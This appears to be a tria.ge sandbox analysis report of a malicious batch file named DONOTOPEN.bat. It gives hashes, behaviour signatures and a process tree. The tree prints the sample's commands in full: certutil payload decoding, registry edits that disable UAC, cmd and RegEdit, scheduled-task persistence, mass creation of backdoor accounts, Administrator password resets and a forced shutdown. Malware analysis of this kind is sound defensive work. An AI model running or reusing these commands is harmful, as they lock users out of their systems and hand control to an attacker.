Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Resubmissions

30/04/2024, 15:25

240430-stvz7shh7t 10

30/04/2024, 13:57

240430-q9acbsge4x 10

Analysis

  • max time kernel
    55s
  • max time network
    57s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240419-en
  • resource tags

    arch:x64arch:x86image:win11-20240419-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    30/04/2024, 13:57

Errors

Reason
Machine shutdown

General

  • Target

    DONOTOPEN.bat

  • Size

    9KB

  • MD5

    4d53c3d83c92387b73339017093a82d0

  • SHA1

    e38992e8b91986cf21052a1cfecedba8a3b6fea6

  • SHA256

    6e5d2734a8ed929fbd2862aff022a597b8418dfef0207df1a772f8372790ae76

  • SHA512

    7122c7d7b2551ef847e94537971ef159570fe812bae9e8f0defb31afd997cc861919f0a1ad476079ad01b95b3aecb6b506bb6ecc83e95d5c3758903fe6706644

  • SSDEEP

    192:UlM+642KhNglPgYCbYBYRCNn9DU2U+ma+RGDzuQj:UlMH4Rh06oU2U+b+sSQj

Malware Config

Signatures

  • UAC bypass 3 TTPs 1 IoCs
  • Disables RegEdit via registry modification 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Drops file in Windows directory 3 IoCs
  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Kills process with taskkill 1 IoCs
  • Modifies data under HKEY_USERS 15 IoCs
  • Modifies registry key 1 TTPs 6 IoCs
  • Runs net.exe
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\DONOTOPEN.bat"
    1⤵
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:2224
    • C:\Windows\system32\certutil.exe
      certutil -decode a start.bat
      2⤵
      • Drops file in Windows directory
      PID:2128
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K start.bat
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4656
      • C:\Windows\system32\taskkill.exe
        TASKKILL /f /im explorer.exe
        3⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:1492
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c C:\Windows\System32\reg.exe ADD HKCU\Software\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 2 /f
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3288
        • C:\Windows\System32\reg.exe
          C:\Windows\System32\reg.exe ADD HKCU\Software\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 2 /f
          4⤵
          • Modifies registry key
          PID:3068
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1612
        • C:\Windows\System32\reg.exe
          C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
          4⤵
          • UAC bypass
          • Modifies registry key
          PID:1888
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c C:\Windows\System32\reg.exe ADD HKCU\Software\Policies\Microsoft\Windows\System /v NoRun /t REG_DWORD /d 1 /f
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4264
        • C:\Windows\System32\reg.exe
          C:\Windows\System32\reg.exe ADD HKCU\Software\Policies\Microsoft\Windows\System /v NoRun /t REG_DWORD /d 1 /f
          4⤵
          • Modifies registry key
          PID:4552
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c C:\Windows\System32\reg.exe ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4496
        • C:\Windows\System32\reg.exe
          C:\Windows\System32\reg.exe ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f
          4⤵
          • Disables RegEdit via registry modification
          • Modifies registry key
          PID:1964
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c C:\Windows\System32\reg.exe ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v legalnoticecaption /t REG_SZ /d "Uh oh, something's wrong..." /f
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4860
        • C:\Windows\System32\reg.exe
          C:\Windows\System32\reg.exe ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v legalnoticecaption /t REG_SZ /d "Uh oh, something's wrong..." /f
          4⤵
          • Modifies registry key
          PID:3156
      • C:\Windows\System32\cmd.exe
        C:\Windows\System32\cmd.exe /c C:\Windows\System32\reg.exe ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v legalnoticetext /t REG_SZ /d "Check README.txt dropped on your desktop for more information" /f
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2396
        • C:\Windows\System32\reg.exe
          C:\Windows\System32\reg.exe ADD HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v legalnoticetext /t REG_SZ /d "Check README.txt dropped on your desktop for more information" /f
          4⤵
          • Modifies registry key
          PID:1076
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Create /SC MINUTE /MO 1 /TN virusalert /TR C:\Users\Admin\AppData\LocalLow\Microsoft\WindowsDefenderFuckService\alert.bat /IT
        3⤵
        • Creates scheduled task(s)
        PID:5052
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Create /SC MINUTE /MO 1 /TN firewallaelrt /TR C:\Users\Admin\AppData\LocalLow\Microsoft\WindowsDefenderFuckService\alert.vbs /IT
        3⤵
        • Creates scheduled task(s)
        PID:672
      • C:\Windows\system32\schtasks.exe
        SCHTASKS /Create /SC MINUTE /MO 1 /TN DefenderTotalFuck /TR C:\Users\Admin\AppData\LocalLow\Microsoft\WindowsDefenderFuckService\runit.bat /IT
        3⤵
        • Creates scheduled task(s)
        PID:3872
      • C:\Windows\system32\net.exe
        NET USER HACKER001 Trash0001 /add
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2800
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 USER HACKER001 Trash0001 /add
          4⤵
            PID:3548
        • C:\Windows\system32\net.exe
          NET USER HACKER002 Trash0001 /add
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1064
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 USER HACKER002 Trash0001 /add
            4⤵
              PID:4876
          • C:\Windows\system32\net.exe
            NET USER HACKER003 Trash0001 /add
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:340
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 USER HACKER003 Trash0001 /add
              4⤵
                PID:2888
            • C:\Windows\system32\net.exe
              NET USER HACKER004 Trash0001 /add
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:2676
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 USER HACKER004 Trash0001 /add
                4⤵
                  PID:2104
              • C:\Windows\system32\net.exe
                NET USER HACKER005 Trash0001 /add
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:3112
                • C:\Windows\system32\net1.exe
                  C:\Windows\system32\net1 USER HACKER005 Trash0001 /add
                  4⤵
                    PID:4524
                • C:\Windows\system32\net.exe
                  NET USER HACKER006 Trash0001 /add
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2284
                  • C:\Windows\system32\net1.exe
                    C:\Windows\system32\net1 USER HACKER006 Trash0001 /add
                    4⤵
                      PID:1560
                  • C:\Windows\system32\net.exe
                    NET USER HACKER007 Trash0001 /add
                    3⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3852
                    • C:\Windows\system32\net1.exe
                      C:\Windows\system32\net1 USER HACKER007 Trash0001 /add
                      4⤵
                        PID:1288
                    • C:\Windows\system32\net.exe
                      NET USER HACKER008 Trash0001 /add
                      3⤵
                        PID:3744
                        • C:\Windows\system32\net1.exe
                          C:\Windows\system32\net1 USER HACKER008 Trash0001 /add
                          4⤵
                            PID:492
                        • C:\Windows\system32\net.exe
                          NET USER HACKER009 Trash0001 /add
                          3⤵
                            PID:5040
                            • C:\Windows\system32\net1.exe
                              C:\Windows\system32\net1 USER HACKER009 Trash0001 /add
                              4⤵
                                PID:4040
                            • C:\Windows\system32\net.exe
                              NET USER HACKER010 Trash0001 /add
                              3⤵
                                PID:5024
                                • C:\Windows\system32\net1.exe
                                  C:\Windows\system32\net1 USER HACKER010 Trash0001 /add
                                  4⤵
                                    PID:952
                                • C:\Windows\system32\net.exe
                                  NET USER HACKER011 Trash0001 /add
                                  3⤵
                                    PID:1360
                                    • C:\Windows\system32\net1.exe
                                      C:\Windows\system32\net1 USER HACKER011 Trash0001 /add
                                      4⤵
                                        PID:1972
                                    • C:\Windows\system32\net.exe
                                      NET USER HACKER012 Trash0001 /add
                                      3⤵
                                        PID:1180
                                        • C:\Windows\system32\net1.exe
                                          C:\Windows\system32\net1 USER HACKER012 Trash0001 /add
                                          4⤵
                                            PID:1152
                                        • C:\Windows\system32\net.exe
                                          NET USER HACKER013 Trash0001 /add
                                          3⤵
                                            PID:1596
                                            • C:\Windows\system32\net1.exe
                                              C:\Windows\system32\net1 USER HACKER013 Trash0001 /add
                                              4⤵
                                                PID:4604
                                            • C:\Windows\system32\net.exe
                                              NET USER HACKER014 Trash0001 /add
                                              3⤵
                                                PID:2408
                                                • C:\Windows\system32\net1.exe
                                                  C:\Windows\system32\net1 USER HACKER014 Trash0001 /add
                                                  4⤵
                                                    PID:660
                                                • C:\Windows\system32\net.exe
                                                  NET USER HACKER015 Trash0001 /add
                                                  3⤵
                                                    PID:3680
                                                    • C:\Windows\system32\net1.exe
                                                      C:\Windows\system32\net1 USER HACKER015 Trash0001 /add
                                                      4⤵
                                                        PID:4620
                                                    • C:\Windows\system32\net.exe
                                                      NET USER HACKER016 Trash0001 /add
                                                      3⤵
                                                        PID:4248
                                                        • C:\Windows\system32\net1.exe
                                                          C:\Windows\system32\net1 USER HACKER016 Trash0001 /add
                                                          4⤵
                                                            PID:240
                                                        • C:\Windows\system32\net.exe
                                                          NET USER HACKER017 Trash0001 /add
                                                          3⤵
                                                            PID:4356
                                                            • C:\Windows\system32\net1.exe
                                                              C:\Windows\system32\net1 USER HACKER017 Trash0001 /add
                                                              4⤵
                                                                PID:3788
                                                            • C:\Windows\system32\net.exe
                                                              NET USER HACKER018 Trash0001 /add
                                                              3⤵
                                                                PID:2808
                                                                • C:\Windows\system32\net1.exe
                                                                  C:\Windows\system32\net1 USER HACKER018 Trash0001 /add
                                                                  4⤵
                                                                    PID:2792
                                                                • C:\Windows\system32\net.exe
                                                                  NET USER HACKER019 Trash0001 /add
                                                                  3⤵
                                                                    PID:1836
                                                                    • C:\Windows\system32\net1.exe
                                                                      C:\Windows\system32\net1 USER HACKER019 Trash0001 /add
                                                                      4⤵
                                                                        PID:3536
                                                                    • C:\Windows\system32\net.exe
                                                                      NET USER HACKER020 Trash0001 /add
                                                                      3⤵
                                                                        PID:3712
                                                                        • C:\Windows\system32\net1.exe
                                                                          C:\Windows\system32\net1 USER HACKER020 Trash0001 /add
                                                                          4⤵
                                                                            PID:4720
                                                                        • C:\Windows\system32\net.exe
                                                                          NET USER Administrator Trashedpc01
                                                                          3⤵
                                                                            PID:2740
                                                                            • C:\Windows\system32\net1.exe
                                                                              C:\Windows\system32\net1 USER Administrator Trashedpc01
                                                                              4⤵
                                                                                PID:1392
                                                                            • C:\Windows\system32\net.exe
                                                                              NET USER Admin Trashedpc01
                                                                              3⤵
                                                                                PID:2912
                                                                                • C:\Windows\system32\net1.exe
                                                                                  C:\Windows\system32\net1 USER Admin Trashedpc01
                                                                                  4⤵
                                                                                    PID:2884
                                                                                • C:\Windows\system32\shutdown.exe
                                                                                  shutdown /s /t 5 /c You are an idiot! HAHAHAHAHAHAHA
                                                                                  3⤵
                                                                                    PID:4596
                                                                                  • C:\Windows\system32\shutdown.exe
                                                                                    shutdown /r /t 0
                                                                                    3⤵
                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                    PID:3808
                                                                              • C:\Windows\SYSTEM32\cmd.exe
                                                                                C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\LocalLow\Microsoft\WindowsDefenderFuckService\alert.bat"
                                                                                1⤵
                                                                                  PID:2080
                                                                                • C:\Windows\System32\WScript.exe
                                                                                  C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\LocalLow\Microsoft\WindowsDefenderFuckService\alert.vbs"
                                                                                  1⤵
                                                                                    PID:1136
                                                                                  • C:\Windows\SYSTEM32\cmd.exe
                                                                                    C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\LocalLow\Microsoft\WindowsDefenderFuckService\runit.bat"
                                                                                    1⤵
                                                                                      PID:3900
                                                                                      • C:\Windows\system32\schtasks.exe
                                                                                        SCHTASKS /Run /TN virusalert
                                                                                        2⤵
                                                                                          PID:3280
                                                                                        • C:\Windows\system32\schtasks.exe
                                                                                          SCHTASKS /Run /TN firewallalert
                                                                                          2⤵
                                                                                            PID:4084
                                                                                        • C:\Windows\system32\LogonUI.exe
                                                                                          "LogonUI.exe" /flags:0x4 /state0:0xa39c8855 /state1:0x41c64e6d
                                                                                          1⤵
                                                                                          • Modifies data under HKEY_USERS
                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                          PID:3620

                                                                                        Network

                                                                                        MITRE ATT&CK Enterprise v15

                                                                                        Replay Monitor

                                                                                        Loading Replay Monitor...

                                                                                        Downloads

                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\WindowsDefenderFuckService\alert.bat

                                                                                          Filesize

                                                                                          435B

                                                                                          MD5

                                                                                          ab1b7b617bc14004ba2291b28ba1a13c

                                                                                          SHA1

                                                                                          76bc336ea75743db95742df682a7f1bd5d495a9b

                                                                                          SHA256

                                                                                          9d1f99df292cc3c17df264810458358c4b303236150a7447c6c5a299067e5530

                                                                                          SHA512

                                                                                          1d42fa77bbe1f83c216c37cde9acada960110078bf9705997c056c5ca975e15e20488ca6a13232a8ebe885cbabeeac21887932568bbb038e204dd9e190cbe74c

                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\WindowsDefenderFuckService\alert.vbs

                                                                                          Filesize

                                                                                          896B

                                                                                          MD5

                                                                                          1c0a55a868aa2003dcb51e010d3b566e

                                                                                          SHA1

                                                                                          f63c853e91f094af8f6c0db0a79979838845c38d

                                                                                          SHA256

                                                                                          fd72a0fb87595ff91d3c78a5e7eb584ee347c35d6b1466841a675bb23158c426

                                                                                          SHA512

                                                                                          ce55e13f2b3b9b4e6d641114bc7a6ee6543be65b206f0ab6fa081d2bef580232cce6b59626e62f32982b9cbb1bf6c4fc093c7891528c8bda88ebc6b112ea803a

                                                                                        • C:\Users\Admin\AppData\LocalLow\Microsoft\WindowsDefenderFuckService\runit.bat

                                                                                          Filesize

                                                                                          65B

                                                                                          MD5

                                                                                          5d98878f4cec866f540d627a905b5dc9

                                                                                          SHA1

                                                                                          6ad61fd942be1dba4130cc51c1b5f11dad6558cb

                                                                                          SHA256

                                                                                          0f7e7769567ebfac514d5ca738644fcbbb3194e963a9be65f17e62f58075360d

                                                                                          SHA512

                                                                                          5146f84d2e39a43ba7592bc8f9e99ee1174f2effaee4a4b5ecffcce554760eb1f8264de13e50cc9b36ddeeeb8ba6a5d868b287548c901a3de2f998eb67ec4f16

                                                                                        • C:\Windows\a

                                                                                          Filesize

                                                                                          8KB

                                                                                          MD5

                                                                                          65888f1a707233e12b232b53ae1a7b77

                                                                                          SHA1

                                                                                          be27cd99043bc7cdf220a5d396aa46e6292bc87d

                                                                                          SHA256

                                                                                          e6ce11f3c97c2e62a41a1a5c01a5fc3391d39e6ef1c45c3134ce1cd182995b97

                                                                                          SHA512

                                                                                          0ed36491f4386f78a4a8a8099a3fa4bc78852a467aee524a06b2a75a68d1b9f437efb9ba2eab5c7ffc4e71bdbbf93b6820ea25134f22fc76e9cf5acab053831f

                                                                                        • C:\Windows\a

                                                                                          Filesize

                                                                                          4KB

                                                                                          MD5

                                                                                          53d27ec4d1ee59de6ccce556bcee63ab

                                                                                          SHA1

                                                                                          c9f1a39f1f8fa7047acde3be5dc8321e4fe238b0

                                                                                          SHA256

                                                                                          c2b977bdbd6df8e045ca51961b8c5a47ffd1017a27e24c90da19fcedff818d10

                                                                                          SHA512

                                                                                          7a38cc222d3806dfba0dc7deff1361e8f73f995230b69fd1054a3ee03345331a751ab9e78debfdaa4c988f9d25ae72215b51520eb8cbecb17db68bf716fe855f

                                                                                        • C:\Windows\start.bat

                                                                                          Filesize

                                                                                          5KB

                                                                                          MD5

                                                                                          92001ff0cdf2d1734fa43ca0b7b53e86

                                                                                          SHA1

                                                                                          ec6c837d9ee3bc2037ce2889748a353a6f8a1d29

                                                                                          SHA256

                                                                                          ba66ffcd3ae6ce6ee7dc74c639791ab454afab6b124ce11be2131f99e37a2b6d

                                                                                          SHA512

                                                                                          7f0d8ba2adb6305b0f30e1800775f107c30b691c2a2ae04420efb9f70fb237ecfb0e3e945825bef887f1ed6dfc3145b2d724e9505c01de551ae99cf98558d91e